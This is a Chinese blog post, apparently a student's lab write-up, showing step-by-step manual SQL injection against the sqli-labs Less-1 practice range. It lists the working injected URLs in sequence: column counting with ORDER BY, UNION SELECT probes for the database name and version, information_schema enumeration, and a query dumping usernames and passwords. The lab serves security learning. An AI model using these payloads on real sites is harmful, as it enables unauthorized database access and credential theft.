【学员分享】基于sql注入的sqli-lab靶场的手工注入

admin 2021年5月29日04:15:54评论49 views字数 1487阅读4分57秒阅读模式

本文作者:啊昊(WEB安全攻防星球学员)


一、尝试



初始化页面如图

【学员分享】基于sql注入的sqli-lab靶场的手工注入

输入?id=1,后得到返回页面:

【学员分享】基于sql注入的sqli-lab靶场的手工注入

尝试单引号测试:?id=1',发现存在注入点

【学员分享】基于sql注入的sqli-lab靶场的手工注入



二、开始sql注入



1、找出页面中背后的数据表中列的数量

http://www.f.com/sqli-labs-master/Less-1/?id=1' or 1=2 order by 3 %23

不断尝试,当我们发现order by 4 时,出现报错

【学员分享】基于sql注入的sqli-lab靶场的手工注入

2、检测哪一列可以显示,并查处数据库名字和版本

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,3 %23

【学员分享】基于sql注入的sqli-lab靶场的手工注入

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,database(),version() %23

【学员分享】基于sql注入的sqli-lab靶场的手工注入

3、查询数据库中表的数量以及名称,并找出可能存在敏感信息的 表

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(*),2 from information_schema.TABLES where TABLE_SCHEMA='security'

【学员分享】基于sql注入的sqli-lab靶场的手工注入

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA='security' limit 0,1

【学员分享】基于sql注入的sqli-lab靶场的手工注入

不断尝试,发现以下表中可能有敏感信息:

【学员分享】基于sql注入的sqli-lab靶场的手工注入

4、查处users表中的字段数以及名称

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(COLUMN_NAME),2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' %23

【学员分享】基于sql注入的sqli-lab靶场的手工注入

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 1,1%23

【学员分享】基于sql注入的sqli-lab靶场的手工注入

【学员分享】基于sql注入的sqli-lab靶场的手工注入

【学员分享】基于sql注入的sqli-lab靶场的手工注入

可以看出,该表字段数为3,依次是id,username,password

5、查询username,和password的值

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,concat(username,'---',password),2 from users %23

【学员分享】基于sql注入的sqli-lab靶场的手工注入

到此告一段落了!



总结


与之前的sqlmap注入相比较,发现手工注入需要更多的逻辑,心里要很清楚下一步代码该做什么,中 途会因为代码的一点错误导致页面报错。然后使用sqlmap这种工具的话,通过命令的方法就可以得到 想要的结果,速度也快。



在公众号回复"sql天书",即可获得sqli-lab靶场使用手册。【成就未解锁




扫描下方二维码加入WEB安全星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

【学员分享】基于sql注入的sqli-lab靶场的手工注入

目前25000+人已关注加入我们

【学员分享】基于sql注入的sqli-lab靶场的手工注入

本文始发于微信公众号(Ms08067安全实验室):【学员分享】基于sql注入的sqli-lab靶场的手工注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月29日04:15:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【学员分享】基于sql注入的sqli-lab靶场的手工注入https://cn-sec.com/archives/292796.html

发表评论

匿名网友 填写信息